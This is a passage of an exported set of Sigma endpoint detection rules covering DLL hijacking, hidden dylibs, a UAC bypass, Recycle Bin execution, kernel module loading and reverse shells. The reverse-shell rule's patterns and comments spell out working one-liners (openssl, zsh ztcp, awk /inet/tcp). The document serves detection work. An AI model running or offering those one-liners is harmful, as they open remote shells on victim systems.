classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'diskpart.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03d8eca6-3f1e-4d11-b989-2c6762458061",
"rule_name": "DLL Hijacking via diskpart.exe",
"rule_description": "Detects potential Windows DLL Hijacking via diskpart.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092994Z",
"creation_date": "2026-03-23T11:45:34.092996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093000Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_hidden_dylib_loaded.yml",
"content": "title: Hidden Dylib File Loaded\nid: 03dfe441-3d70-41a1-8a9b-9e3c68cee99b\ndescription: |\n Detects a hidden dylib library being loaded.\n Adversaries can create hidden malicious libraries to avoid raising users' suspicions.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/06/03\nmodified: 2025/11/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '.*\\/\\.[^\\/]*$'\n\n exclusion_grr:\n ImageLoaded:\n - '/private/var/db/oah/*/*/.Python.aot'\n - '/usr/local/lib/grr/grr_*/.Python'\n Image: '/usr/local/lib/grr/grr_*/grr'\n\n exclusion_postman:\n Image: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_var_folder:\n ImageLoaded|startswith:\n - '/private/var/folders/??/'\n - '/private/var/db/???/'\n\n exclusion_claude:\n Image|contains:\n - '/claude/versions/'\n - '/claude-code/'\n - '/extensions/anthropic.claude-code-'\n - '/Users/*/.claude/'\n ImageLoaded: '/private/tmp/.????????????????-????????.node'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b",
"rule_name": "Hidden Dylib File Loaded",
"rule_description": "Detects a hidden dylib library being loaded.\nAdversaries can create hidden malicious libraries to avoid raising users' suspicions.\nIt is recommended to check the origin of the library to determine its legitimacy.\n",
"rule_creation_date": "2024-06-03",
"rule_modified_date": "2025-11-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591378Z",
"creation_date": "2026-03-23T11:45:34.591382Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591389Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsget.yml",
"content": "title: DLL Hijacking via dsget.exe\nid: 03fc1f68-4d9c-420b-b4a5-79fae4a133ee\ndescription: |\n Detects potential Windows DLL Hijacking via dsget.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsget.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee",
"rule_name": "DLL Hijacking via dsget.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsget.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "04429fe5-8be4-4481-b930-acfc3c648434",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075966Z",
"creation_date": "2026-03-23T11:45:34.075968Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075973Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpupdate.yml",
"content": "title: DLL Hijacking via gpupdate.exe\nid: 04429fe5-8be4-4481-b930-acfc3c648434\ndescription: |\n Detects potential Windows DLL Hijacking via gpupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "04429fe5-8be4-4481-b930-acfc3c648434",
"rule_name": "DLL Hijacking via gpupdate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0462a933-4c70-4baa-b836-58671ae8a94b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095664Z",
"creation_date": "2026-03-23T11:45:34.095666Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095670Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://www.revshells.com/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1059_004_reverse_shell_command_line_macos.yml",
"content": "title: Reverse Shell Executed from Command-line\nid: 0462a933-4c70-4baa-b836-58671ae8a94b\ndescription: |\n Detects suspicious shell commands related to the execution of reverse shells.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate the process that started the reverse shell, as well as any malicious actions the reverse shell could have taken.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/05/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n - 'sh*>*/dev/tcp/'\n - 'sh*>*/dev/udp/'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n 
exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/udp/127.0.0.1/'\n\n condition: selection_command or (all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0462a933-4c70-4baa-b836-58671ae8a94b",
"rule_name": "Reverse Shell Executed from Command-line",
"rule_description": "Detects suspicious shell commands related to the execution of reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\n",
"rule_creation_date": "2024-05-15",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0486b170-5b3c-4234-8610-a8881dfb1dbf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081276Z",
"creation_date": "2026-03-23T11:45:34.081278Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081282Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_taskkill.yml",
"content": "title: DLL Hijacking via taskkill.exe\nid: 0486b170-5b3c-4234-8610-a8881dfb1dbf\ndescription: |\n Detects potential Windows DLL Hijacking via taskkill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0486b170-5b3c-4234-8610-a8881dfb1dbf",
"rule_name": "DLL Hijacking via taskkill.exe",
"rule_description": "Detects potential Windows DLL Hijacking via taskkill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "04b80cc3-4931-4733-9085-38663dfb2e0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077465Z",
"creation_date": "2026-03-23T11:45:34.077467Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077472Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/"
],
"name": "t1548_002_post_uac_bypass_fodhelper.yml",
"content": "title: UAC Bypass Executed via fodhelper\nid: 04b80cc3-4931-4733-9085-38663dfb2e0c\ndescription: |\n Detects a process being spawned by fodhelper.exe.\n Fodhelper.exe has autoelevation capabilities and an integrity level of High.\n This is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n As such, it is recommended to look for other alerts related to ms-settings.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\ndate: 2020/10/12\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\fodhelper.exe'\n exclusion_werfault:\n Image:\n - '?:\\windows\\system32\\werfault.exe'\n - '?:\\windows\\syswow64\\werfault.exe'\n # c:\\windows\\system32\\werfault.exe -u -p 11444 -s 704\n CommandLine|contains: ' -u -p '\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "04b80cc3-4931-4733-9085-38663dfb2e0c",
"rule_name": "UAC Bypass Executed via fodhelper",
"rule_description": "Detects a process being spawned by fodhelper.exe.\nFodhelper.exe has autoelevation capabilities and an integrity level of High.\nThis is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nAs such, it is recommended to look for other alerts related to ms-settings.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627504Z",
"creation_date": "2026-03-23T11:45:34.627506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627510Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1564_recycle_bin.yml",
"content": "title: Process Executed from Recycle Bin Folder\nid: 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\ndescription: |\n Detects an execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/07/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_managesoft:\n ParentImage: '?:\\Program Files (x86)\\ManageSoft\\Tracker\\ndtrack.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44",
"rule_name": "Process Executed from Recycle Bin Folder",
"rule_description": "Detects an execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2021-07-08",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "050e879b-c3c6-421d-8fc1-c03917f620d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596684Z",
"creation_date": "2026-03-23T11:45:34.596687Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596695Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://linux.die.net/man/8/insmod",
"https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md",
"https://attack.mitre.org/techniques/T1547/006/",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1547_006_kernel_module_load_insmod.yml",
"content": "title: Kernel Module Loaded via Insmod\nid: 050e879b-c3c6-421d-8fc1-c03917f620d2\ndescription: |\n Detects the execution of insmod to load a kernel module manually.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n It is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/insmod\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md\n - 